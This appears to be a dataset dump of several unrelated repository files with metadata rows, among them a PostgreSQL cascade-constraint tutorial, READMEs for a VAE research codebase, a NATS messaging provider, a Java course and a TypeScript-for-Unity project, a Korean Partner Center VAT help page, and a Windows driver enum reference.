WHERE ID = <ID Value>; You should see the following... > UPDATE 1 10. Now notice we haven't updated `PERSON` at all but when we run SELECT * FROM MAIN.PERSON; We see the new name... name | email | customer_id ----------+------------------+------------- John Doe | JohnDoe@cscc.edu | 420 (1 row) This is because the change was cascaded to the other table thanks to our constraint. 11. Now let's explore the delete cascade. Our user has decided this game wasn't for him and deleted his Character. Notice when he deletes the Character with the following query... DELETE FROM CUSTOMER WHERE ID=420; You should see the following... >DELETE 1 12. Now when we search the `PERSON` relation again we should notice that there are no longer any users... SELECT * FROM PERSON; Should return... first_name | last_name | char_name ------------+-----------+----------- (0 rows) ## Takehome Work 1. Create schema for tables to track a user's transactions and also their favorite items. ## References ## 1. [Primary Key](https://w3resource.com/PostgreSQL/primary-key-constraint.php) 2. [Foriegn Key](https://www.postgresql.org/docs/8.3/static/tutorial-fk.html)
38.292035
356
0.653571
eng_Latn
0.950389
48554e4e0df812fe06263c22e398677cd9aafaf0
658
md
Markdown
README.md
yixinwang/lidvae-public
8a0a6a5873888ec68c67dd1802bc42294abe2330
[ "MIT" ]
1
2022-02-02T12:50:05.000Z
2022-02-02T12:50:05.000Z
README.md
yixinwang/lidvae-public
8a0a6a5873888ec68c67dd1802bc42294abe2330
[ "MIT" ]
null
null
null
README.md
yixinwang/lidvae-public
8a0a6a5873888ec68c67dd1802bc42294abe2330
[ "MIT" ]
null
null
null
## Reference implementation for "Posterior Collapse and Latent Variable Non-identifiability" This repository contains the code for + the empirical study about LIDVAE on images and text (Section 4.1) + the empirical study about latent variable non-identifiability and posterior collapse in PPCA (Section 4.2) #### Environment The code is tested in Python 3.7.3, Pytorch 1.4.0, and Tensorflow 1.14.0. #### References Wang, Y., Blei, D.M., and Cunningham, J.P. (2021) Posterior Collapse and Latent Variable Non-identifiability. _NeurIPS 2021_. [[link](https://proceedings.neurips.cc/paper/2021/hash/2b6921f2c64dee16ba21ebf17f3c2c92-Abstract.html)]
34.631579
230
0.768997
eng_Latn
0.824661
4855c04dc1df1b3e886b3ae7c0f9296ebff6fa47
1,140
md
Markdown
partner-center/organization-tax-info.md
MicrosoftDocs/partner-center-pr.ko-kr
5dd68728f0b2016eeebe309a1938df2d1202caec
[ "CC-BY-4.0", "MIT" ]
2
2020-02-08T09:52:15.000Z
2020-05-19T19:38:15.000Z
partner-center/organization-tax-info.md
MicrosoftDocs/partner-center-pr.ko-kr
5dd68728f0b2016eeebe309a1938df2d1202caec
[ "CC-BY-4.0", "MIT" ]
3
2019-11-02T10:50:01.000Z
2020-05-01T01:25:33.000Z
partner-center/organization-tax-info.md
MicrosoftDocs/partner-center-pr.ko-kr
5dd68728f0b2016eeebe309a1938df2d1202caec
[ "CC-BY-4.0", "MIT" ]
6
2019-10-09T20:06:40.000Z
2021-10-09T10:22:43.000Z
--- title: 비즈니스 세금에 대 한 VAT ID 추가 ms.topic: article ms.date: 09/27/2021 ms.service: partner-dashboard ms.subservice: partnercenter-billing description: 파트너 센터 구매에 대한 세금은 회사 주소에 따라 결정됩니다. 일부 국가의 기업은 해당 VAT 번호 또는 로컬 동급를 제공할 수 있습니다. author: BrentSerbus ms.author: brserbus ms.localizationpriority: medium ms.custom: SEOAPR.20 ms.openlocfilehash: 8fee7d9d3e9fec8c0889fb5f52e770381d05def4 ms.sourcegitcommit: d731813da1d31519dc2dc583d17899e5cf4ec1b2 ms.translationtype: MT ms.contentlocale: ko-KR ms.lasthandoff: 09/27/2021 ms.locfileid: "129073593" --- # <a name="add-a-vat-id-to-your-billing-profile"></a>청구 프로필에 VAT ID 추가 **적절 한 역할**: 전역 관리자 | 사용자 관리 관리자 | 청구 관리자 | 관리 에이전트 | 판매 에이전트 다음 절차를 사용 하 여 VAT ID를 포함 하도록 청구 프로필을 업데이트할 수 있습니다. 이는 국가 또는 지역에서 사용할 수 없습니다. ## <a name="update-your-billing-profile-with-your-vat-id"></a>VAT ID로 청구 프로필 업데이트 1. [파트너 센터 대시보드](https://partner.microsoft.com/dashboard/)에 로그인합니다. 2. 설정 기어 아이콘, **계정 설정** 를 차례로 선택 합니다. 3. 페이지 메뉴에서 **파트너 청구 프로필** 을 선택 합니다. 4. **재무 데이터** 섹션에서 **업데이트** 를 선택합니다. 5. **회사 세금 ID** 에 VAT ID 번호를 지정합니다. ## <a name="next-steps"></a>다음 단계 - [세금 및 면세](tax-and-tax-exemptions.md)
28.5
90
0.715789
kor_Hang
1.000001
4855fde3dd0bcd3c49108c2477805faea1c1bc62
1,070
md
Markdown
README.md
faustohernandez/nats-provider
45f5755168ef96339dd9cd4b3cbd9d7bedde3b03
[ "Apache-2.0" ]
null
null
null
README.md
faustohernandez/nats-provider
45f5755168ef96339dd9cd4b3cbd9d7bedde3b03
[ "Apache-2.0" ]
null
null
null
README.md
faustohernandez/nats-provider
45f5755168ef96339dd9cd4b3cbd9d7bedde3b03
[ "Apache-2.0" ]
null
null
null
![travis](https://travis-ci.org/wascc/nats-provider.svg?branch=master)&nbsp; # waSCC Messaging Provider (NATS) The waSCC NATS capability provider exposes publish and subscribe functionality to actors. The following configuration values can be passed to the waSCC host runtime to configure the NATS connection on a per-actor basis: * `SUBSCRIPTION` - The subscription string. Each guest module can create _one_ subscription. This string can contain wildcard characters. * `QUEUEGROUP_NAME` - If you want all instances of the same actor to share round-robin delivery of messages, then set a unique queue group name for them. * `URL` - The URL to initially connect with a server. Should use the `nats://` scheme prefix. * `CLIENT_JWT` - If not using anonymous authentication, this is the _signed user JWT_ used for client authentication against the NATS 2.x+ server. * `CLIENT_SEED` - If you have supplied a value for the client JWT, the seed is required for authentication. This should be the nats-style "nkeys" encoded string for the seed and NOT a raw binary value.
82.307692
219
0.783178
eng_Latn
0.99573
485601092524eb911aabde27cd01492191300226
10,485
md
Markdown
README.md
shafiunmiraz0/Java-Crash-Course
9b9ffa8fc82a6110d033ec9429644be147d1e3f4
[ "MIT" ]
2
2020-10-16T18:31:44.000Z
2020-11-30T17:47:06.000Z
README.md
shafiunmiraz0/Java-Crash-Course
9b9ffa8fc82a6110d033ec9429644be147d1e3f4
[ "MIT" ]
null
null
null
README.md
shafiunmiraz0/Java-Crash-Course
9b9ffa8fc82a6110d033ec9429644be147d1e3f4
[ "MIT" ]
null
null
null
![Java-logo](https://github.com/shafiunmiraz0/Java-Crash-Course/blob/main/Assets/Java-Logo.png) [![Java](https://img.shields.io/badge/Java%20Programming-Language-2c93b0?style=for-the-badge)](https://www.java.com/en/) Java is a class-based, object-oriented programming language that is designed to have as few implementation dependencies as possible. ### Contents 🟠 [![Java](https://img.shields.io/badge/Introduction%20of-Java%20Programming%20Language-2c93b0?style=flat)](https://github.com/shafiunmiraz0/Java-Crash-Course/tree/main/Intro%20to%20Java) 🟠 [![Java](https://img.shields.io/badge/Installation%20of-Java%20Programming%20Language-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Hello-World-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Understanding-Java%20Foundations-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Introduction%20of-Arguments%20and%20Parameters-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Input-and%20Output-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Introduction%20of-Variables-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Introduction%20of-Primitives%20and%20Objects-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Variable-Declaration%20and%20Initialization-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Primitive-Data%20Types-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Scanner-Input-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Numeric%20Data%20Types-and%20Properties%20(Infinity,%30NaN)-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Numeric%20Expressions-and%20Operators-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Introduction%20of-Numeric%20Methods-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/String-Class-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/String-Methods-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/More-String%20Methods-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Creating-Basic%20Classes,%20Methods,%20and%20Properties-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/String%20Comparison-and%20Interning-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Introduction%20of-if,%20else%20if,%20else-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Comparison%20and-Logical%20Operators-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Introduction%20of-Switch%20Statement-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Ternary-Conditional%30Operator-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Single%20line-if%20Statement-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Introduction%20of-Loops%20(While%20loops)-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Do%20While-Loop-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/For-Loops-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Nested%20Blocks-(Nested%20if)-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Nested-for%20Loops-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Nested-While%20Loops-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Variable%20Scope-with%20Nested%20Control%20Flow-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Introduction%20of-break-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Introduction%20of-continue-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Introduction%20of-Arrays-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Working-with%20Arrays-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Arrays%20toString-and%20Arrays%20deeptoString-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Array%20Values%20from-Input%20and%20for%20Loop-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Search%20an-Array%20with%20for%20Loop-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Arrays.sort%20and-Arrays.parallelSort-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Array%20Methods-(Arrays.fill,%20Arrays.asList,%20Arrays.equals)-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Introduction%20of-2D%20Arrays-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Working%20with-2D%20Arrays-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Iterate%20through%202D-Structures%20with%20for%20Loop-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/ArrayList-Introduction-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/List%20Interface%20and-ArrayList%20Implementation-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Working%20with-Lists-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Quickly%20Initialize%20a%20List%20with-Elements%20and%20How%20to%20Print%20List-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/for%20Loops%20with%20Lists%20&-How%20to%20Modify%20Each%20Element-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/for%20each%20Loop-in%20Java-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Nested%20for-each%20Loop-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Convert%20List%20to-an%20Array-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Sort%20and%20Reverse%20a%20List%20with-Collections.sort%20and%20Collections.reverse-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Intro%20to-Object%20Oriented%20Programming%20(OOP)-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Class-vs%20Object-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Introduction%20of-Fields-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Introduction%20of-Methods-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Basics%20of%20Creating-a%20Class%20and%20Object-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Adding%20Fields%20to-a%20Class-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Creating%20Our-First%20Method-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Arguments%20and-Parameters%20in%20Methods-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Return-Statement-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Introduction%20of-Encapsulation-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Create-a%20Getter-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Create%20a-Setter-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Custom%20Getter-and%20Setter-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/ArrayList%20f-Custom%20Type-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Creating-Custom%20Type%20in%20Loop-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Taking%20Custom%20Types-as%20Arguments-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Intro%20to-Static%20Methods-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Creating%20a-Static%20Method-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Method%20to%20take%20an%20ArrayList-of%20Custom%20Type-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Introduction%20of-Method%20Overloading%20and%20Optional%20Parameters-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Working%20with%20overloads-to%20Print%20a%20User-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Searching%20a%20List%20for-Custom%20Objects-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Method-Overriding-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Override-toString-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Override-Equals-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Overload%20the%20Search-to%20Take%20in%20a%20User%20Object-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Returning-Custom%20Objects-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Passing%20by%20Value-or%20Reference-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Introduction%20of-Inheritance-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Working%20with-Inheritance-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Virtual-in%20Java-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Creating%20a%20Method-in%20User%20Class%20and%20Overriding%20in%20a%20Derived%20Class-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/abstract-Class-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/abstract-Method-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Introduction%20of-Polymorphism-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Polymorphism-in%20Practice-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Introduction%20of-Constructors-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Creating%20the-Default%20Constructor-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Custom-Constructors-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Invoke%20Parent-Class%20Methods%20with%20super%20keyword-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Readonly%20Fields-Assigned%20with%20Constructor-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Introduction%20of-Interfaces-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Creating%20an-Interface%20for%20Functionality-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Final-Methods-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Final-Classes-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Introduction%20of-enum-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/Introduction%20of-Java%20Programming%20Language-2c93b0?style=flat)]() 🟠 [![Java](https://img.shields.io/badge/enum-in%20switch-2c93b0?style=flat)]() ### Features of Java Programming Language 🟠 [![Java](https://img.shields.io/badge/Develop-Mobile%20Applications-2c93b0?style=flat)]() ### Popular Open Source GitHub Repository to Contribute 🟠 [![Java](https://img.shields.io/badge/Jenkins-Automation%20Server-2c93b0?style=flat)](https://github.com/jenkinsci/jenkins)
47.876712
187
0.730472
yue_Hant
0.798809
48561eca59dd1ded6af93ce102d566961b03e81d
8,637
md
Markdown
README.md
SpiralP/typescript-for-unity
8969272eb15d7a7c8adf7191dd806f4dbcaccb07
[ "MIT" ]
94
2018-12-04T07:59:26.000Z
2022-03-28T03:01:28.000Z
README.md
suchipi/typescript-for-unity
8969272eb15d7a7c8adf7191dd806f4dbcaccb07
[ "MIT" ]
1
2020-05-06T07:00:10.000Z
2020-05-06T07:00:10.000Z
README.md
SpiralP/typescript-for-unity
8969272eb15d7a7c8adf7191dd806f4dbcaccb07
[ "MIT" ]
13
2019-02-23T01:00:32.000Z
2022-02-01T17:39:36.000Z
# TypeScript for Unity This repo lets you use modern ES2018 JavaScript and TypeScript for scripting or as an embedded language in Unity. It was extracted from an unreleased game created by [SpiralP](http://github.com/SpiralP) and [suchipi](http://github.com/suchipi). It supports Windows, Mac, and Linux. ## Features - Use TypeScript or JavaScript for scripting in your game or as an embedded user-facing language - Supports ES2018 features and syntax with no compilation step - Native ECMAScript modules support (`import`/`export`) - Simple `JSBehaviour` object lets you write `MonoBehaviour`s in JS/TS - Generated TypeScript bindings for Unity classes - Code generation utilities for writing your own bindings between C# and JavaScript ## Getting Started This repo contains an example Unity Project already set up for you. Clone it and init submodules, then open it in the Unity Editor. Open the scene "Default Scene"; you should see a cube move away from the camera. The code for this is in `src/JSCubeBehaviour.ts`. ``` git clone git@github.com:SpiralP/typescript-for-unity.git cd typescript-for-unity git submodule init git submodule update ``` ## Usage ### Setup To use this in your own Unity Project: - Copy in `tsconfig.json`, the `src` folder, and everything from `Assets/Plugins` and `Assets/Scripts` - Make sure your Project has a `StreamingAssets` folder - Add a `GameObject` in your scene and add the `JavaScript.Engine` script to it. This will initialize the JavaScript Engine. - You need a `GameObject` with `JavaScript.Engine` in every scene where you want to run JavaScript. You should only have one per scene. ### Running code Now, there are a few ways to execute code: #### `JavaScript.Engine.RunScript(string script)` You can call `JavaScript.Engine.RunScript(code)` to execute a code string. For example: ```cs JavaScript.Engine.RunScript("console.log('hi')"); ``` #### `JavaScript.Engine.RunFile(string filename)` You can call `JavaScript.Engine.RunFile(moduleSpecifier)` to load and run a file in `src` as a _Script_. For example: ```cs Engine.RunFile("vendor/inspect"); ``` #### `JavaScript.Engine.Import(string specifier)` You can call `JavaScript.Engine.Import(moduleSpecifier)` to import and run a file in `src` as a _Module_. For example: ```cs Engine.Import("JSCubeBehaviour"); ``` #### `JavaScript.Runner` You can add a `JavaScript.Runner` script to a `GameObject`. This is an interface to `JavaScript.Engine.RunScript` and `JavaScript.Engine.Import`. - It has two values you can set from the Unity Editor: `Code` and `Module Specifier`. You should use one or the other. - If you put a string of JavaScript code in the `Code` property, it will run that code (eg `console.log('hi')`). - If you put the name of a file in `src` in the `Module Specifier` property, it will import and run that module (can be JS or TS). #### `JSBehaviour` You can add a `JSBehaviour` script to a `GameObject`. - `JSBehaviour` provides a `MonoBehaviour`-like interface for writing scripts from JS/TS. - In the editor, set its `Module Specifier` property to the name of a file in `src`. That file's default export should be a class that extends the global `JSBehaviour`. - The JS/TS class's `Start`, `Update`, etc methods will be called just like in a `MonoBehaviour`. - You can use `this.monoBehaviour` to get a reference to the `MonoBehaviour` that wraps your class, in order to get access to components on the object. - See `src/JSCubeBehaviour.ts` for an example. ### A note about module specifiers Non-relative `import`s are resolved relative to the `src` directory: ```js import JSCubeBehaviour from "JSCubeBehaviour"; // loads `src/JSCubeBehaviour.ts` ``` You do not need to specify the `.js` or `.ts` extension (but you can if you want). If importing a `.json` file, you need to specify the extension. The same lookup algorithm is used when you give a module specifier to a `JavaScript.Runner` script, a `JSBehaviour` script, or any of the methods on `JavaScript.Engine` that accept a path to a JS/TS file. ### Accessing Unity objects from JS/TS When writing your scripts, you may need access to Unity `GameObject`s and prefabs. There are two ways to get access to them: - If you are using a `JSBehaviour`, you can use `this.monoBehaviour` to access the instance of the `MonoBehaviour` class that wraps your `JSBehaviour`. You can use that to get the `GameObject` your `JSBehaviour` script is attached to, and any other components on that `GameObject`. - You can add "bindings" to the engine to make objects globally-available. View the `GameObject` you put a `JavaScript.Engine` script on in the Inspector; you'll notice one of its properties is a list called "Bindings". Increase the list length to add a new entry, give the entry a name, and then drag an object into the "Bound Object" slot. After doing this, you can use the global function `bindings.get` from JavaScript to get a bound object by name; for instance, `bindings.get("player")`. If you are using TypeScript, you can specify the type of the bound object with `bindings.get<UnityEngine.GameObject>("player")`. ### Creating bindings between JS and C# code You can use the `JavaScript.Bridge` class to create wrapper objects for C# classes that makes them available in JS/TS. There are already bindings for several classes in the `JavaScript.API` namespace which you can reference for examples. A good way to write bindings is to use the code generation utilities in `JSClassGenerator` and `JSTypeScriptGenerator` to create C# bridging classes and `*.d.ts` files for your C# object. The generator can't automatically write bridging code for everything, but it provides a good starting point. - Open `JSClassGenerator` and `JSTypeScriptGenerator` and look for `[MenuItem("JSClassGenerator/Generate Class Files")]` and `[MenuItem("JSClassGenerator/Generate TypeScript Files")]`. - Add your types to the `for` loop in each file. - In the Unity Editor, click `JSClassGenerator` -> `Generate Class Files` and `JSClassGenerator` -> `Generate TypeScript Files`. This will generate a `*.cs` file and a `*.d.ts` file for each type and put them in the `Scripts/JavaScript/API/.Generated/` directory. - Go review the generated files, edit them as necessary, and then move them out of `.Generated` into `Scripts/JavaScript/API`. - Call your generated class's `Register` method in `JavaScript.Engine`'s `Awake` method: ```cs void Awake() { // ... Engine.With(() => { Module.Loader.Register(context); API.JSSystem.JSSystem.Register(context); API.Console.Register(context); API.DOM.Register(context); API.Inspect.Register(context); API.TypescriptServices.Register(context); API.File.Register(context); API.Http.Register(context); API.UpdateHelper.Register(context); API.Timer.Register(context); API.PromiseContinuation.Register(context); API.ChakraInternals.Register(context); API.JSUnityEngine.JSUnityEngine.Register(context); JavaScript.JSBehaviour.Register(context); // Add your new class here // ... ``` ### Updating TypeScript This repo has TypeScript 3.0. If you want to use a different version, you can replace the files `src/vendor/typeScriptServices.js` and `src/vendor/typeScriptServices.d.ts` with newer versions from [the TypeScript repo](https://github.com/Microsoft/TypeScript/tree/master/lib). ### Updating Chakra Core This repo uses Chakra Core (Microsoft Edge's JavaScript engine) to run JavaScript and TypeScript. It includes some binaries in `Assets/Plugins`: - `ChakraCore.bundle` - macOS binary - `libChakraCore.so` - Linux binary (untested) - `ChakraCore.dll` - Windows binary You can replace these with a newer [release of ChakraCore](https://github.com/Microsoft/ChakraCore/releases) to get new language features. ### Adding support for importing more filetypes If you want to support Coffeescript, Reason, or importing `png` files (webpack style), you can add code to the following places: - If you want to allow importing your type without the extension in the module specifier (`import Foo from "foo"` instead of `import Foo from "foo.png"`), add it to `JavaScript.Module.Loader`'s `SupportedExtensions` List. - Handle your filetype extension in `JavaScript.Module.Loader`'s `ConvertSourceToJS` method; you need to return a string of JavaScript code. ## License This code is licensed under the MIT license. The owner(s) of this repo have no social obligation to support or maintain this code; they made it for fun during their own time and are sharing it because they think it could be useful to others. Fork it or leave it.
53.645963
622
0.756628
eng_Latn
0.981479
48561f5d7a8d35bcec7b6510927a41037d28d4ed
7,642
md
Markdown
wdk-ddi-src/content/d3dkmdt/ne-d3dkmdt-_dxgkmdt_opm_protection_standard.md
pcfist/windows-driver-docs-ddi
a14a7b07cf628368a637899de9c47e9eefba804c
[ "CC-BY-4.0", "MIT" ]
null
null
null
wdk-ddi-src/content/d3dkmdt/ne-d3dkmdt-_dxgkmdt_opm_protection_standard.md
pcfist/windows-driver-docs-ddi
a14a7b07cf628368a637899de9c47e9eefba804c
[ "CC-BY-4.0", "MIT" ]
null
null
null
wdk-ddi-src/content/d3dkmdt/ne-d3dkmdt-_dxgkmdt_opm_protection_standard.md
pcfist/windows-driver-docs-ddi
a14a7b07cf628368a637899de9c47e9eefba804c
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- UID: NE:d3dkmdt._DXGKMDT_OPM_PROTECTION_STANDARD title: "_DXGKMDT_OPM_PROTECTION_STANDARD" author: windows-driver-content description: The DXGKMDT_OPM_PROTECTION_STANDARD enumeration indicates the type of television signal for which a video output supports protection. old-location: display\dxgkmdt_opm_protection_standard.htm old-project: display ms.assetid: 9f079edf-312a-4218-8b73-0325ccca5a05 ms.author: windowsdriverdev ms.date: 2/26/2018 ms.keywords: DXGKMDT_OPM_PROTECTION_STANDARD, DXGKMDT_OPM_PROTECTION_STANDARD enumeration [Display Devices], DXGKMDT_OPM_PROTECTION_STANDARD_ARIBTRB15_1125I, DXGKMDT_OPM_PROTECTION_STANDARD_ARIBTRB15_525I, DXGKMDT_OPM_PROTECTION_STANDARD_ARIBTRB15_525P, DXGKMDT_OPM_PROTECTION_STANDARD_ARIBTRB15_750P, DXGKMDT_OPM_PROTECTION_STANDARD_CEA805A_TYPEA_1125I, DXGKMDT_OPM_PROTECTION_STANDARD_CEA805A_TYPEA_525P, DXGKMDT_OPM_PROTECTION_STANDARD_CEA805A_TYPEA_750P, DXGKMDT_OPM_PROTECTION_STANDARD_CEA805A_TYPEB_1125I, DXGKMDT_OPM_PROTECTION_STANDARD_CEA805A_TYPEB_525P, DXGKMDT_OPM_PROTECTION_STANDARD_CEA805A_TYPEB_750P, DXGKMDT_OPM_PROTECTION_STANDARD_EIA608B_525, DXGKMDT_OPM_PROTECTION_STANDARD_EN300294_625I, DXGKMDT_OPM_PROTECTION_STANDARD_IEC61880_2_525I, DXGKMDT_OPM_PROTECTION_STANDARD_IEC61880_525I, DXGKMDT_OPM_PROTECTION_STANDARD_IEC62375_625P, DXGKMDT_OPM_PROTECTION_STANDARD_NONE, DXGKMDT_OPM_PROTECTION_STANDARD_OTHER, DmEnums_ce6cf9d1-ec7d-43bd-9204-2428751bdabf.xml, _DXGKMDT_OPM_PROTECTION_STANDARD, d3dkmdt/DXGKMDT_OPM_PROTECTION_STANDARD, d3dkmdt/DXGKMDT_OPM_PROTECTION_STANDARD_ARIBTRB15_1125I, d3dkmdt/DXGKMDT_OPM_PROTECTION_STANDARD_ARIBTRB15_525I, d3dkmdt/DXGKMDT_OPM_PROTECTION_STANDARD_ARIBTRB15_525P, d3dkmdt/DXGKMDT_OPM_PROTECTION_STANDARD_ARIBTRB15_750P, d3dkmdt/DXGKMDT_OPM_PROTECTION_STANDARD_CEA805A_TYPEA_1125I, d3dkmdt/DXGKMDT_OPM_PROTECTION_STANDARD_CEA805A_TYPEA_525P, d3dkmdt/DXGKMDT_OPM_PROTECTION_STANDARD_CEA805A_TYPEA_750P, d3dkmdt/DXGKMDT_OPM_PROTECTION_STANDARD_CEA805A_TYPEB_1125I, d3dkmdt/DXGKMDT_OPM_PROTECTION_STANDARD_CEA805A_TYPEB_525P, d3dkmdt/DXGKMDT_OPM_PROTECTION_STANDARD_CEA805A_TYPEB_750P, d3dkmdt/DXGKMDT_OPM_PROTECTION_STANDARD_EIA608B_525, d3dkmdt/DXGKMDT_OPM_PROTECTION_STANDARD_EN300294_625I, d3dkmdt/DXGKMDT_OPM_PROTECTION_STANDARD_IEC61880_2_525I, d3dkmdt/DXGKMDT_OPM_PROTECTION_STANDARD_IEC61880_525I, d3dkmdt/DXGKMDT_OPM_PROTECTION_STANDARD_IEC62375_625P, d3dkmdt/DXGKMDT_OPM_PROTECTION_STANDARD_NONE, d3dkmdt/DXGKMDT_OPM_PROTECTION_STANDARD_OTHER, display.dxgkmdt_opm_protection_standard ms.prod: windows-hardware ms.technology: windows-devices ms.topic: enum req.header: d3dkmdt.h req.include-header: D3dkmdt.h req.target-type: Windows req.target-min-winverclnt: Available in Windows Vista and later versions of the Windows operating systems. req.target-min-winversvr: req.kmdf-ver: req.umdf-ver: req.ddi-compliance: req.unicode-ansi: req.idl: req.max-support: req.namespace: req.assembly: req.type-library: req.lib: req.dll: req.irql: PASSIVE_LEVEL topic_type: - APIRef - kbSyntax api_type: - HeaderDef api_location: - d3dkmdt.h api_name: - DXGKMDT_OPM_PROTECTION_STANDARD product: Windows targetos: Windows req.typenames: DXGKMDT_OPM_PROTECTION_STANDARD --- # _DXGKMDT_OPM_PROTECTION_STANDARD enumeration ## -description The DXGKMDT_OPM_PROTECTION_STANDARD enumeration indicates the type of television signal for which a video output supports protection. ## -syntax ```` typedef enum _DXGKMDT_OPM_PROTECTION_STANDARD { DXGKMDT_OPM_PROTECTION_STANDARD_OTHER                = 0x80000000, DXGKMDT_OPM_PROTECTION_STANDARD_NONE                 = 0x00000000, DXGKMDT_OPM_PROTECTION_STANDARD_IEC61880_525I        = 0x00000001, 